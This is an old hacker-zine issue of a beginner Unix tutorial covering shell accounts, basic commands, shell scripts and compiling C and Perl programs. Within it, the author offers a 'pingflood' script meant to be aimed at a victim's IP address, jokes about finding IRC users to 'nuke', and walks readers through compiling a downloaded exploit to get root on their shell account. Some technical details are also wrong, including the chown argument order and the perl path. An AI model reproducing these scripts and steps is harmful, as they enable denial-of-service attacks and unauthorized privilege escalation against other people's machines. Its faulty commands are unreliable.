Well, I'm back. It seems a lot of people really enjoyed Unix-TS #1, so here I am writing a second one. Thanks for all the reader feedback. It really helped to decide what to put in this issue. So anyway, read on and enjoy.
Table of Contents
• Feedback on last issue
• Shell accounts
• The commands we will learn to love
• Shell scripts (basic programming)
• Working with C and Perl (more advanced programming)
Feedback from the last issue
I'd like to thank everyone who sent me email or gave me advice on Hackaddict in the past two weeks. I've had a lot of comments (all good, except for two exceptions :) So anyway, here are some answers to some frequently asked questions I got:
1. Why don't you like Linux over BSD? That's so weird!
I guess it's just a usage thing. Linux is the most common form of UNIX, but my main shell that I use is running BSD. BSD was the flavour I learned first, so that's why I prefer it. I also forgot to mention Sun OS as a good UNIX operating system.
2. Help! When I type "csh" to get into the C shell, and then type "echo $SHELL", I still get "/bin/ksh"!
Sorry about that. I forgot to add something last issue. When you type "csh", you are just executing the C shell like any other program, meaning you are running the C shell over the Korn shell or Bash shell or whatever your default is. To permanently change your shell, use the "chsh" command.
3. Where can I get a shell account? Can you give me one?
Hell no! Like I have shells to give out! But anyway, I have some info below on acquiring shell accounts.
Shell Accounts
Ok. So now you've read all this stuff on the unix operating system, and you're eager to use it. But you don't have a shell, so what can you do?
There are a number of things you should check.
1) First of all, your ISP might have given you a shell (Unless of course it's AOL, meaning you suck). Here is the easiest way to do this:
Telnet to yourisp.address.com
If you get this:
yourisp.address.com ttyp7
SunOS v4.3
login:
Then try your internet account login and password. If it logs you in and you get a
%
or a
$
Then you're in luck. You have a shell. Other addresses to try can be "shell.isp.com" and "unix.isp.com".
2) Buy a shell. You can get cheap shells from lots of companies. Try searching in Yahoo for "unix shells" and you'll get a long list of ISPs that give shells. Other places to try are www.linuxbox.com and www.haxor.com.
Haxor.com is the most preferable place to get a shell. "The server by hackers for hackers". You can pay yearly or monthly. It's pretty fast, runs Linux, and you get a big disk quota (meaning how much disk space you can hold on your account).
3) Get a free shell. Lot's of companies give you free shell accounts, like sdf.lonestar.org. The problem with these is that they're really painfully slow, or they are really restricted.
Go to http://godson.home.ml.org for a large, up to date list on commercial and free shell accounts.
More Commands
You should have read UNIX #1, so there's no need to review all those commands. (If you needed help, printing out the DOS 2 UNIX chart would have been a good idea.) Anyway, now I'll cover some more advanced useful commands.
chown • Changes the ownership of a file.
example:
% chown file.doc fuzebox
Notes: You cannot change the ownership of a file you do not own. (That one was for Sir Klown, who kept trying to change the ownership of the shadowed password file to himself :)
w • Shows a different log of who's logged in.
example:
% w
11:24PM up 5:26, 4 users, load averages: .30, 0.63, 0.19
USER TTY FROM LOGIN@ IDLE WHAT
riso d0 - 8:14PM 3:10 pppd ipcp-accept-remote
fuzebox p0 connection12.re 11:24PM - w
root p3 - 3:12PM 64:21 accept-local
sadist p2 p3.netbox.ls45.r 11:15PM - w
Notes: Ok, so this is pretty useless. It shows the same stuff as when you type "who" except a little more detail and in a different format.
The TTY is the port they've connected to.
The LOGIN@ is the time they logged in.
IDLE shows how long they've been asleep at the keyboard (-w means no idleness)
WHAT means what kind of connection they have. The guy at the top is dialing in, the two blanks have telnetted, and the local one is well, local.
lynx • A really crappy text-based web browser
example:
% lynx
Notes: Use this only if you are really desperate. It is useful only for finding text information. You can change the selected link with the arrow keys (pretty decrepid, eh?)
irc • Internet Relay Chat in unix.
example:
% irc or ircii
Notes: Some would say IRC sucks (That was for you, TW ;). I don't mind it, it's a great place to find PC users to nuke. The useful irc commands are as follows:
/server <servername> The irc server to connect to. (irc.primenet.com, us.undernet.org)
/nick <nickname> The handle that is displayed to everyone else as you.
/join <channelname> Channelnames have to begin with a "#"
/leave <channelname> Leaves the specified channel.
/quit Gets you out of IRC and back into unix where you belong!!!
Ok, I know that was a pathetic commands section. I'm really running out of commands to explain here. It would be nice if there was some user feedback (hint: fuzebox@cyberdude.com) so I could decide which to include in my next edition...
Shell Script Programming
Those of you who are familiar with DOS will recognize a shell script as a "batch" file. A batch file is a file that executes a bunch of commands in succession, (kind of like an AppleScript or OneClick palette).
Shell scripts are commonly used to automate inconvieniant jobs. For example, the ".login" file we looked at last month was a shell script. It executed a bunch of commands for you at login so you didn't have to do it every time.
A really easy pingflood script would go like this:
% pico pingflood
(pico opens)
(Now you type the following)
#!/bin/sh
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
ping 127.0.0.1 &
(Now hit control-X and choose "yes" to save the changes)
% ls
mail cool.stuff.doc pingflood
% ./pingflood
% ps
2352 ping 127.0.0.1 fuzebox
2353 ping 127.0.0.1 fuzebox
2355 ping 127.0.0.1 fuzebox
2356 ping 127.0.0.1 fuzebox
2354 ping 127.0.0.1 fuzebox
2359 ping 127.0.0.1 fuzebox
2361 ping 127.0.0.1 fuzebox
2343 ping 127.0.0.1 fuzebox
2323 ping 127.0.0.1 fuzebox
2367 ping 127.0.0.1 fuzebox
2354 ping 127.0.0.1 fuzebox
And so on.
-The "#!/bin/sh" tells the script which shell to use for commands. It is universally a good idea to use "/bin/sh", the Bourne shell, because it is on every UNIX system you will every encounter. Yes, it is sad, but some UNIXs don't come with the C shell.
-Some notes on this script: substitute "127.0.0.1" for your victim's ip address, or you'll pingflood yourself!
- the "dot-slash" is used to execute the script. If you just typed "pingflood", you would have gotten an "invalid command" message.
Next month I'll get into variables and command line arguments, so you can just type
%./flood some.stupid.guy
And it will do it, so you don't have to modify the code.
Advanced UNIX Programming
C and Perl... the two best UNIX programming languages... The two most powerful... the two hardest to learn...
Anyway, running C programs and running Perl programs are two different things, so I'll start with C.
NOTE: I will not actually teach you to program in C or in Perl. Get a book. (I've got about a dozen)
C
So, you've downloaded this cool exploit program from http://www.rootshell.com and you're eager to get root real fast. Problem is, the program is a ".c" file. Pretty easy. Use Fetch to upload the program to your shell account, then log in and do the following:
% ls
some.stupid.doc nuke easyroot.c
Make sure you have the program in your directory.
Now, let's see if your system has the GNU compiler:
% gcc -o root easyroot.c
-If you then get the "%" prompt back, your program has been compiled into an executable.
-If you get an invalid command message, you don't have GNU. No matter, we'll use UNIX's built in compiler.
% cc -o root easyroot.c
This should compile.
NOTE: If you get a bunch of errors scrolling down, it means the program was improperly written, or wasn't written for your system. It will usually say at the top of the source code which system it was written for.
Now, I'll explain what we typed here:
cc - This invokes the compiler.
-o - This tells the compiler, "Name the program the name that comes after me"
root - This is what I decided to call my program
easyroot.c - This is the location of the C source code.
Well that was pretty easy for advanced programming. If you want to learn C, there are many good books available, and good texts on the Hackaddict hotline server.
(Weasel's note: If you want to teach yourself C, get "Learn C on the Macintosh" by Dave Mark. It will introduce you to the C language and show you basic functions)
Perl
Perl scripts are run much like shell scripts. The difference is (besides the fact that the code is in perl) is the line at the top.
To run a perl script, the perl script must have
#!/bin/usr/perl
at the top (or whatever is the path to the perl application. Ask your admin, or do some hunting around to find it.
Make sure the first line has the path to the perl application. Now close the file, and from the prompt, type:
% ./myprogram
(myprogram being the program you want to run)
It will run, no compiling necessary.
In Closing
Yes, that was a bit lame compared to last month's issue, but I'm working on it. I really appreciate reader feedback, whether it be by email or on the hotline server. I'm on Hackaddict usually at least once every two or three nights, depending on how busy I am. I might start coming on during the day as well.
Thanks for reading. Next month's topics will include: Installing HX (hotline for unix), advanced shell programming, important files on the system and what they do, and whatever you request.
